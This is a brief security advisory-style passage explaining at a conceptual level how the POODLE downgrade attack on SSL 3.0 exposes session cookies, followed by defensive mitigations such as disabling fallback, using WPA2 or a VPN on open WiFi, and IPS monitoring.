POODLE (Padding Oracle on Downgraded Legacy Encryption) enables web session hijacking by using the version downgrade capability built into TLS to exploit a flaw in Secure Sockets Layer version 3 (SSL 3.0). Although SSL 3.0 was deprecated long ago, all major browsers continue to support SSL for backwards compatibility.By using a man-in-the-middle attack to force clients and servers to downgrade from TLS to SSL, hackers can intercept and modify an SSL stream encrypted in CBC mode to decrypt HTTP session cookies.By stepping through cookies one byte at a time, a hacker can decrypt the entire cookie and then use that cookie to hijack the session.

Disabling TLS fallback to SSL in both web browsers and servers prevents the POODLE attack from being successful.However, there’s an easier way for end users to avoid this attack:don’t use open WiFi hotspots.Because POODLE requires man-in-the-middle access to traffic exchanged between a web server and browser, encrypting your own web traffic with WPA2 (or even WPA) can mitigate this attack – at least over wireless.Alternatively, “bring your own encryption” to open WiFi hotspots by sending all of your traffic – even encrypted web traffic – through a VPN tunnel.

Perhaps POODLE will finally give software vendors a good reason to retire SSL 3.0. In the meantime, companies that operate open WiFi hotspots (e.g., guest access networks, public hotspots) should use an IPS to watch for POODLE downgrade and cookie-guessing traffic as described in the above advisory.